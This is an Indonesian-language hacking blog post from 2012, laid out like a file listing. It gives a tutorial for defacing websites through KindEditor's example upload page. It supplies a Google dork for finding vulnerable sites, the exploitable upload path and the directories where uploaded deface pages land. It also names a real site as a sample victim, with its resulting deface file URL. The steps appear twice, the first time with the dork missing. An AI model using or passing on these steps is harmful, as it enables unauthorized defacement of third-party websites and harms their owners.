Filename | Deface Web kindEditor |
Permission | rwxr--r-- |
Author | Fell Sadiz |
Modified | 7/07/2012 03:50:00 PM |
Group | Deface | Hacking | Tutorial |
Actions | |
Navigation | / Home / Deface / Hacking / Tutorial / Deface Web kindEditor |
Kembali lagi ni masbro dengan hal mepes memepes website kali ini kita coba dengan target kindEditor .
Oke, Langsung pancal ni.
Dork :
Exploit: http://target.com/path/kindeditor/examples/uploadbutton.html
Buka hasil dengan link : http//target.com/path/kindeditor/attached/file/
atau
http//target.com/themes/default/js/kindeditor/attached/file/
Kemudian cari root/folder hari ini/tanggal saat mastah melakukan upload kemudian cek file.html depesan .
Sample : http://arimlab.com/themes/default/js/kindeditor/examples/uploadbutton.html
Result :
Oke, Langsung pancal ni.
Dork :
intitle:index of? inurl:kindeditor inurl: "examples/uploadbutton.html"
Exploit: http://target.com/path/kindeditor/examples/uploadbutton.html
Buka hasil dengan link : http//target.com/path/kindeditor/attached/file/
atau
http//target.com/themes/default/js/kindeditor/attached/file/
Kemudian cari root/folder hari ini/tanggal saat mastah melakukan upload kemudian cek file.html depesan .
Sample : http://arimlab.com/themes/default/js/kindeditor/examples/uploadbutton.html
Result :
http://arimlab.com/themes/default/js/kindeditor/attached/file/20120325/20120325121023_43134.html
0 Respons: